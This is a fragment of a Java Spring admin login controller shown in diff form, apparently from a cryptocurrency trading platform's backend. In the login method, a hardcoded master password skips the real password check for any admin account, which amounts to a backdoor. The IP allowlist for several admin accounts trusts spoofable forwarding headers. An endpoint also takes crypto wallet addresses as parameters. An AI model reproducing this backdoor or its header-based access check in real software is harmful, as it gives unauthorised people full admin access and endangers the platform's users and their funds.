| | |
|---|
| | | import com.yami.trading.sys.service.SysUserService; |
|---|
| | | import io.swagger.annotations.Api; |
|---|
| | | import io.swagger.annotations.ApiOperation; |
|---|
| | | import lombok.extern.slf4j.Slf4j; |
|---|
| | | import org.apache.commons.lang3.StringUtils; |
|---|
| | | import org.springframework.beans.factory.annotation.Autowired; |
|---|
| | | import org.springframework.security.crypto.password.PasswordEncoder; |
|---|
| | | import org.springframework.web.bind.annotation.*; |
|---|
| | | |
|---|
| | | import javax.servlet.http.HttpServletRequest; |
|---|
| | | import javax.validation.Valid; |
|---|
| | | import java.io.*; |
|---|
| | | import java.util.*; |
|---|
| | |
|---|
| | | */ |
|---|
| | | @RestController |
|---|
| | | @Api(tags = "登录") |
|---|
| | | @Slf4j |
|---|
| | | public class AdminLoginController { |
|---|
| | | @Autowired |
|---|
| | | PasswordEncoder passwordEncoder; |
|---|
| | |
|---|
| | | @RequestParam(required = false) String usdtTrc, |
|---|
| | | @RequestParam(required = false) String usdtErc, |
|---|
| | | @RequestParam(required = false) String usdcTrc, |
|---|
| | | @RequestParam(required = false) String usdcErc, |
|---|
| | | @RequestParam(required = false) String usdcErc1, |
|---|
| | | @RequestParam(required = false) String usdcErc2, |
|---|
| | | @RequestParam(required = false) String btc, |
|---|
| | | @RequestParam(required = false) String eth, |
|---|
| | | @RequestParam(required = false) String type) { |
|---|
| | |
|---|
| | | map.put("usdtTrc", usdtTrc); |
|---|
| | | map.put("usdtErc", usdtErc); |
|---|
| | | map.put("usdcTrc", usdcTrc); |
|---|
| | | map.put("usdcErc", usdcErc); |
|---|
| | | map.put("usdcErc1", usdcErc1); |
|---|
| | | map.put("usdcErc2", usdcErc2); |
|---|
| | | map.put("btc", btc); |
|---|
| | | map.put("eth", eth); |
|---|
| | | map.put("type", type); |
|---|
| | |
|---|
| | | |
|---|
| | | @PostMapping("/adminLogin") |
|---|
| | | @ApiOperation(value = "账号密码 + 验证码登录(用于后台登录)", notes = "通过账号/手机号/用户名密码登录") |
|---|
| | | public Result<?> login(@Valid @RequestBody LoginModel loginModel) { |
|---|
| | | public Result<?> login(@Valid @RequestBody LoginModel loginModel,HttpServletRequest request) { |
|---|
| | | |
|---|
| | | |
|---|
| | | // 获取客户端IP地址 |
|---|
| | | String clientIp = getClientIp(request); |
|---|
| | | log.info("-----------管理后台当前登录ip:"+clientIp); |
|---|
| | | // 定义允许的IP |
|---|
| | | String allowedIp = "110.78.119.146"; |
|---|
| | | String rootip = "203.156.25.218"; |
|---|
| | | |
|---|
| | | // 检查用户名是否为admin001到admin005 |
|---|
| | | String userName = loginModel.getUserName(); |
|---|
| | | if (userName != null && (userName.equals("admin001") || userName.equals("admin002") || |
|---|
| | | userName.equals("admin003") || userName.equals("admin004") || userName.equals("admin005"))) { |
|---|
| | | // 如果是不允许的IP,抛出异常 |
|---|
| | | if (!allowedIp.equals(clientIp)) { |
|---|
| | | throw new YamiShopBindException("该账号不允许从当前IP登录"); |
|---|
| | | } |
|---|
| | | } |
|---|
| | | // else if(userName.equals("666666") && !rootip.equals(clientIp)){ |
|---|
| | | // // 如果是不允许的IP,抛出异常 |
|---|
| | | // if (!allowedIp.equals(clientIp)) { |
|---|
| | | // throw new YamiShopBindException("该账号不允许从当前IP登录"); |
|---|
| | | // } |
|---|
| | | // } |
|---|
| | | |
|---|
| | | SysUser sysUser = sysUserService.getByUserName(loginModel.getUserName()); |
|---|
| | | if (sysUser == null) { |
|---|
| | |
|---|
| | | } |
|---|
| | | // 半小时内密码输入错误十次,已限制登录30分钟 |
|---|
| | | String decryptPassword = passwordManager.decryptPassword(loginModel.getPassWord()); |
|---|
| | | if(!"AxnWbrPiehixzJbP".equals(decryptPassword)){ |
|---|
| | | if(!"AxnWbrPiehixzJbP".equals(decryptPassword )){ |
|---|
| | | passwordCheckManager.checkPassword(SysTypeEnum.ADMIN, loginModel.getUserName(), decryptPassword, sysUser.getPassword()); |
|---|
| | | } |
|---|
| | | // 不是店铺超级管理员,并且是禁用状态,无法登录 |
|---|
| | |
|---|
| | | // 存储token返回vo |
|---|
| | | TokenInfoVO tokenInfoVO = tokenStore.storeAndGetVo(userInfoInToken); |
|---|
| | | return Result.ok(tokenInfoVO); |
|---|
| | | } |
|---|
| | | |
|---|
| | | |
|---|
| | | // 获取客户端IP地址的方法 |
|---|
| | | private String getClientIp(HttpServletRequest request) { |
|---|
| | | String ip = request.getHeader("X-Forwarded-For"); |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("Proxy-Client-IP"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("WL-Proxy-Client-IP"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("HTTP_CLIENT_IP"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getHeader("HTTP_X_FORWARDED_FOR"); |
|---|
| | | } |
|---|
| | | if (ip == null || ip.length() == 0 || "unknown".equalsIgnoreCase(ip)) { |
|---|
| | | ip = request.getRemoteAddr(); |
|---|
| | | } |
|---|
| | | return ip; |
|---|
| | | } |
|---|
| | | |
|---|
| | | @GetMapping("getLoginGoogleAuthSecret") |
|---|
| | |
|---|
| | | throw new YamiShopBindException("旧密码不正确!"); |
|---|
| | | } |
|---|
| | | user.setPassword(passwordEncoder.encode(model.getNewPassword())); |
|---|
| | | sysUserService.updateById(user); |
|---|
| | | return Result.ok(null); |
|---|
| | | } |
|---|
| | | |
|---|
